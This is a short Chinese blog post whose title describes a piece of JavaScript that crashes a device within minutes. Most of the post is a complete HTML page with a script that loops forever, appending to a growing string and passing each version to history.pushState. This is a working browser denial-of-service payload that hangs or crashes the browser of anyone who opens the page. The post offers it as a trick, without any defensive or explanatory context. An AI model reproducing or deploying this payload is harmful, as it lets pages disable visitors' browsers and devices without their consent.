苗火 Nicholas
[JS]一段特别代码分分钟让设备死机
2016-1-22 萧
<html>
<body>
<script>
var total="";
var i=1;
while(i++){
total = total+i.toString();
history.pushState(0,0,total);
}
</script>
</body>
</html>
发表评论:
昵称

邮件地址 (选填)

个人主页 (选填)

内容